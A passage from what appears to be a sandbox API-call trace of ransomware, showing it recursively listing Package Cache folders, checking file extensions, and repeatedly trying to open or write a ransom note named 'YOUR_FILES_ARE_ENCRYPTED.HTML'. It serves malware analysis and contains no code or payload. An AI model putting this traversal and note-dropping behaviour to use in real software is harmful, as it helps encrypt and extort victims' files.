(lpString=".E01FDA55BBDCED16BDE9F8CF62CBB915E0E79FD1D7F1623E421FAED1FFB1D436") returned 65 [0110.478] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x63bee8, dwReserved1=0x6f40f0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.478] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.478] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 143 [0110.478] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0110.478] lstrlenW (lpString=".msi") returned 4 [0110.478] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0110.478] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafb3cbf2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafb3cbf2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbc7242, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63bee8, dwReserved1=0x6f40f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.478] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafb3cbf2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafb3cbf2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbc7242, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63bee8, dwReserved1=0x6f40f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.478] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0110.478] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0110.478] GetProcessHeap () returned 0x600000 [0110.478] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.478] GetProcessHeap () returned 0x600000 [0110.478] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.478] GetProcessHeap () returned 0x600000 [0110.478] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.479] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbcc19a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafbcc19a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbd0ec6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4198, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.479] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbcc19a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafbcc19a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbd0ec6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4198, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.479] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.479] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0110.479] GetProcessHeap () returned 0x600000 [0110.479] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.480] GetProcessHeap () returned 0x600000 [0110.480] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.480] GetProcessHeap () returned 0x600000 [0110.480] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.480] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbd71fc, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafbd71fc, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbde597, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.480] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbd71fc, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafbd71fc, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbde597, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.480] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.480] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0110.480] GetProcessHeap () returned 0x600000 [0110.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.481] GetProcessHeap () returned 0x600000 [0110.481] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.481] GetProcessHeap () returned 0x600000 [0110.481] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.482] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0110.482] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.482] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 75 [0110.482] GetProcessHeap () returned 0x600000 [0110.482] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.483] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0110.483] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*" [0110.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafbed006, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0110.483] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafbed006, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.483] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x9d5870d9, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x272, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0110.483] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.483] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 85 [0110.483] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.483] lstrlenW (lpString=".rsm") returned 4 [0110.483] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.483] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x34a1fdf0, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0110.483] StrStrIW (lpFirst="vcredist_x86.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.484] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 92 [0110.484] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0110.484] lstrlenW (lpString=".exe") returned 4 [0110.484] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0110.484] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbe95ff, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafbe95ff, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbf1dfc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.484] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbe95ff, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafbe95ff, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafbf1dfc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.484] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0110.484] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.484] GetProcessHeap () returned 0x600000 [0110.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.484] GetProcessHeap () returned 0x600000 [0110.484] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.484] GetProcessHeap () returned 0x600000 [0110.485] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.486] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fce5b7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0110.486] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.486] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 86 [0110.486] GetProcessHeap () returned 0x600000 [0110.486] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.487] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0110.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*" [0110.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fce5b7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafc9118a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0110.487] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fce5b7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafc9118a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.487] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.487] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.487] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned 95 [0110.487] GetProcessHeap () returned 0x600000 [0110.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.488] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0110.488] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*" [0110.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafc89c86, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.488] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafc89c86, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="..", cAlternateFileName="")) returned 1 [0110.488] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafcca738, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafcca738, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4016, dwReserved1=0x6f3f68, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0110.488] StrStrIW (lpFirst="vcRuntimeAdditional_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.488] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned 121 [0110.488] GetProcessHeap () returned 0x600000 [0110.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.489] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0110.489] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*" [0110.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafcca738, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafcca738, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b458, dwReserved1=0x6f3f70, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.489] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafcca738, 